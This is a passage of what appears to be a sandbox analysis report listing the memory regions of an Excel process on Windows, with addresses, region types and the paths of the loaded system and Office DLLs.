0x77930000 end_va = 0x77a4efff entry_point = 0x77930000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 314 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x77a50000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 315 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 316 start_va = 0x77d20000 end_va = 0x77d26fff entry_point = 0x77d20000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 317 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 318 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 319 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 320 start_va = 0x13f520000 end_va = 0x14149afff entry_point = 0x13f520000 region_type = mapped_file name = "excel.exe" filename = "\\PROGRA~1\\MICROS~1\\Office15\\EXCEL.EXE" (normalized: "c:\\progra~1\\micros~1\\office15\\excel.exe") Region: id = 321 start_va = 0x7feea140000 end_va = 0x7feea1bafff entry_point = 0x7feea140000 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll") Region: id = 322 start_va = 0x7feea1c0000 end_va = 0x7feea290fff entry_point = 0x7feea1c0000 region_type = mapped_file name = "wxpnse.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\WXPNSE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\wxpnse.dll") Region: id = 323 start_va = 0x7feea820000 end_va = 0x7feea83bfff entry_point = 0x7feea820000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\msohev.dll") Region: id = 324 start_va = 0x7feea840000 end_va = 0x7feea9bdfff entry_point = 0x7feea840000 region_type = mapped_file name = "dwrite.dll" 
filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 325 start_va = 0x7feea9c0000 end_va = 0x7feeaa58fff entry_point = 0x7feea9c0000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 326 start_va = 0x7feeaa60000 end_va = 0x7feeab25fff entry_point = 0x7feeaa60000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 327 start_va = 0x7feeab30000 end_va = 0x7feeacfffff entry_point = 0x7feeab30000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 328 start_va = 0x7feead00000 end_va = 0x7feec113fff entry_point = 0x7feead00000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\oart.dll") Region: id = 329 start_va = 0x7feecd60000 end_va = 0x7fef1a4afff entry_point = 0x7feecd60000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll") Region: id = 330 start_va = 0x7fef1b30000 end_va = 0x7fef1c06fff entry_point = 0x7fef1b30000 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 331 start_va = 0x7fef1d00000 end_va = 0x7fef1d6efff entry_point = 0x7fef1d00000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 332 start_va = 0x7fef2000000 end_va = 
0x7fef2222fff entry_point = 0x7fef2000000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll") Region: id = 333 start_va = 0x7fef2230000 end_va = 0x7fef224bfff entry_point = 0x7fef2230000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 334 start_va = 0x7fef2370000 end_va = 0x7fef240ffff entry_point = 0x7fef2370000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 335 start_va = 0x7fef2880000 end_va = 0x7fef2bf6fff entry_point = 0x7fef2880000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll") Region: id = 336 start_va = 0x7fef2c00000 end_va = 0x7fef4eb0fff entry_point = 0x7fef2c00000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll") Region: id = 337 start_va = 0x7fef6c50000 end_va = 0x7fef6e41fff entry_point = 0x7fef6c50000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 338 start_va = 0x7fef6ee0000 end_va = 0x7fef6f50fff entry_point = 0x7fef6ee0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: 
"c:\\windows\\system32\\winspool.drv") Region: id = 339 start_va = 0x7fef7660000 end_va = 0x7fef76defff entry_point = 0x7fef7660000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 340 start_va = 0x7fef76e0000 end_va = 0x7fef771afff entry_point = 0x7fef76e0000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 341 start_va = 0x7fef7720000 end_va = 0x7fef77e5fff entry_point = 0x7fef7720000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 342 start_va = 0x7fef7ab0000 end_va = 0x7fef7abbfff entry_point = 0x7fef7ab0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 343 start_va = 0x7fef7c80000 end_va = 0x7fef7c89fff entry_point = 0x7fef7c80000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 344 start_va = 0x7fef7d80000 end_va = 0x7fef7e58fff entry_point = 0x7fef7d80000 region_type = mapped_file name = "adal.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\ADAL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll") Region: id = 345 start_va = 0x7fef7e60000 end_va = 0x7fef7f41fff entry_point = 0x7fef7e60000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 346 start_va = 0x7fef7f50000 end_va = 0x7fef7f56fff entry_point = 0x7fef7f50000 region_type = mapped_file name = "msimg32.dll" filename = 
"\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 347 start_va = 0x7fef89a0000 end_va = 0x7fef8e9ffff entry_point = 0x7fef89a0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf") Region: id = 348 start_va = 0x7fef8ea0000 end_va = 0x7fef91b5fff entry_point = 0x7fef8ea0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 349 start_va = 0x7fef9470000 end_va = 0x7fef9639fff entry_point = 0x7fef9470000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 350 start_va = 0x7fef9640000 end_va = 0x7fef96e6fff entry_point = 0x7fef9640000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 351 start_va = 0x7fef96f0000 end_va = 0x7fef9744fff entry_point = 0x7fef96f0000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 352 start_va = 0x7fef9750000 end_va = 0x7fef9783fff entry_point = 0x7fef9750000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 353 start_va = 0x7fef9dd0000 end_va = 0x7fef9dddfff entry_point = 0x7fef9dd0000 region_type = mapped_file name = "msimtf.dll" filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll") Region: id = 354 start_va = 0x7fefaad0000 end_va = 0x7fefab26fff entry_point = 0x7fefaad0000 region_type = mapped_file name = "apphelp.dll" filename = 
"\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 355 start_va = 0x7fefaba0000 end_va = 0x7fefac03fff entry_point = 0x7fefaba0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 356 start_va = 0x7fefac10000 end_va = 0x7fefac80fff entry_point = 0x7fefac10000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 357 start_va = 0x7fefb710000 end_va = 0x7fefb724fff entry_point = 0x7fefb710000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 358 start_va = 0x7fefb730000 end_va = 0x7fefb73bfff entry_point = 0x7fefb730000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 359 start_va = 0x7fefb740000 end_va = 0x7fefb755fff entry_point = 0x7fefb740000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 360 start_va = 0x7fefbd50000 end_va = 0x7fefbd7cfff entry_point = 0x7fefbd50000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 361 start_va = 0x7fefbdc0000 end_va = 0x7fefbdd0fff entry_point = 0x7fefbdc0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 362 start_va = 0x7fefbe50000 end_va = 0x7fefbf79fff entry_point = 0x7fefbe50000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") 
Region: id = 363 start_va = 0x7fefbf80000 end_va = 0x7fefbfb4fff entry_point = 0x7fefbf80000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 364 start_va = 0x7fefbfc0000 end_va = 0x7fefbfd7fff entry_point = 0x7fefbfc0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 365 start_va = 0x7fefc080000 end_va = 0x7fefc0c2fff entry_point = 0x7fefc080000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 366 start_va = 0x7fefc0d0000 end_va = 0x7fefc1c1fff entry_point = 0x7fefc0d0000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 367 start_va = 0x7fefc1d0000 end_va = 0x7fefc3e4fff entry_point = 0x7fefc1d0000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll") Region: id = 368 start_va = 0x7fefc3f0000 end_va = 0x7fefc445fff entry_point = 0x7fefc3f0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 369 start_va = 0x7fefc450000 end_va = 0x7fefc57bfff entry_point = 0x7fefc450000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 370 start_va = 0x7fefc5d0000 end_va = 0x7fefc7c3fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "comctl32.dll" filename = 
"\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 371 start_va = 0x7fefcc60000 end_va = 0x7fefcc6bfff entry_point = 0x7fefcc60000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 372 start_va = 0x7fefd090000 end_va = 0x7fefd0d6fff entry_point = 0x7fefd090000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 373 start_va = 0x7fefd390000 end_va = 0x7fefd3a6fff entry_point = 0x7fefd390000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 374 start_va = 0x7fefd890000 end_va = 0x7fefd8b2fff entry_point = 0x7fefd890000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 375 start_va = 0x7fefd930000 end_va = 0x7fefd93afff entry_point = 0x7fefd930000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 376 start_va = 0x7fefd960000 end_va = 0x7fefd984fff entry_point = 0x7fefd960000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 377 start_va = 0x7fefd990000 end_va = 0x7fefd99efff entry_point = 0x7fefd990000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 378 start_va = 0x7fefda40000 end_va = 0x7fefda7cfff 
entry_point = 0x7fefda40000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 379 start_va = 0x7fefda80000 end_va = 0x7fefda93fff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 380 start_va = 0x7fefdaa0000 end_va = 0x7fefdaaefff entry_point = 0x7fefdaa0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 381 start_va = 0x7fefdb40000 end_va = 0x7fefdb4efff entry_point = 0x7fefdb40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 382 start_va = 0x7fefdb50000 end_va = 0x7fefdb69fff entry_point = 0x7fefdb50000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 383 start_va = 0x7fefdb70000 end_va = 0x7fefdcd6fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 384 start_va = 0x7fefdce0000 end_va = 0x7fefdd19fff entry_point = 0x7fefdce0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 385 start_va = 0x7fefdd20000 end_va = 0x7fefdd8afff entry_point = 0x7fefdd20000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 386 start_va = 0x7fefde30000 end_va = 0x7fefde65fff entry_point = 0x7fefde30000 region_type = mapped_file name = "cfgmgr32.dll" filename = 
"\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 387 start_va = 0x7fefde70000 end_va = 0x7fefde7dfff entry_point = 0x7fefde70000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 388 start_va = 0x7fefde80000 end_va = 0x7fefdf1efff entry_point = 0x7fefde80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 389 start_va = 0x7fefdf20000 end_va = 0x7fefdfb6fff entry_point = 0x7fefdf20000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 390 start_va = 0x7fefdfc0000 end_va = 0x7fefe096fff entry_point = 0x7fefdfc0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 391 start_va = 0x7fefe0b0000 end_va = 0x7fefe1d9fff entry_point = 0x7fefe0b0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 392 start_va = 0x7fefe1e0000 end_va = 0x7fefe20dfff entry_point = 0x7fefe1e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 393 start_va = 0x7fefe210000 end_va = 0x7fefe276fff entry_point = 0x7fefe210000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 394 start_va = 0x7fefe280000 end_va = 0x7fefe2f0fff entry_point = 0x7fefe280000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 395 start_va = 
0x7fefe300000 end_va = 0x7fefe408fff entry_point = 0x7fefe300000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 396 start_va = 0x7fefe410000 end_va = 0x7fefe4eafff entry_point = 0x7fefe410000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 397 start_va = 0x7fefe4f0000 end_va = 0x7fefe6f2fff entry_point = 0x7fefe4f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 398 start_va = 0x7fefe700000 end_va = 0x7feff487fff entry_point = 0x7fefe700000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 399 start_va = 0x7feff490000 end_va = 0x7feff6e8fff entry_point = 0x7feff490000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 400 start_va = 0x7feff770000 end_va = 0x7feff8e7fff entry_point = 0x7feff770000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 401 start_va = 0x7feff8f0000 end_va = 0x7feff941fff entry_point = 0x7feff8f0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 402 start_va = 0x7feff9a0000 end_va = 0x7feffaccfff entry_point = 0x7feff9a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 403 start_va = 0x7feffaf0000 end_va = 0x7feffcc6fff entry_point = 0x7feffaf0000 region_type = mapped_file name = "setupapi.dll" 
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 404 start_va = 0x7feffcd0000 end_va = 0x7feffd68fff entry_point = 0x7feffcd0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 405 start_va = 0x7feffd70000 end_va = 0x7feffe38fff entry_point = 0x7feffd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 406 start_va = 0x7feffe40000 end_va = 0x7feffe5efff entry_point = 0x7feffe40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 407 start_va = 0x7feffe70000 end_va = 0x7feffe70fff entry_point = 0x7feffe70000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 408 start_va = 0x7ff6b220000 end_va = 0x7ff6b229fff entry_point = 0x0 region_type = private name = "private_0x000007ff6b220000" filename = "" Region: id = 409 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 410 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 411 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 412 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 413 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 
414 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 415 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 416 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 417 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 418 start_va = 0x7fffff80000 end_va = 0x7fffff8ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 419 start_va = 0x7fffff90000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 420 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 421 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 422 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 423 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 424 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 425 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 426 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = 
"" Region: id = 427 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 428 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 429 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 430 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 431 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 432 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 433 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 434 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 435 start_va = 0x7fee9fe0000 end_va = 0x7feea0a1fff entry_point = 0x7fee9fe0000 region_type = mapped_file name = "mssvp.dll" filename = "\\Windows\\System32\\mssvp.dll" (normalized: "c:\\windows\\system32\\mssvp.dll") Region: id = 436 start_va = 0x7feea740000 end_va = 0x7feea75afff entry_point = 0x7feea740000 region_type = mapped_file name = "mapi32.dll" filename = "\\Windows\\System32\\mapi32.dll" (normalized: "c:\\windows\\system32\\mapi32.dll") Region: id = 437 start_va = 0xa6c0000 end_va = 0xa7bffff entry_point = 0x0 region_type = private name = "private_0x000000000a6c0000" filename = "" Region: id = 438 start_va = 0x7fef7d30000 end_va = 0x7fef7d4efff entry_point = 0x7fef7d30000 region_type = mapped_file name = 
"thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 439 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 440 start_va = 0x7fef7ac0000 end_va = 0x7fef7af3fff entry_point = 0x7fef7ac0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 441 start_va = 0x8800000 end_va = 0x8801fff entry_point = 0x8800000 region_type = mapped_file name = "mssvp.dll.mui" filename = "\\Windows\\System32\\en-US\\mssvp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mssvp.dll.mui") Region: id = 442 start_va = 0x7fef5230000 end_va = 0x7fef5283fff entry_point = 0x7fef5230000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: 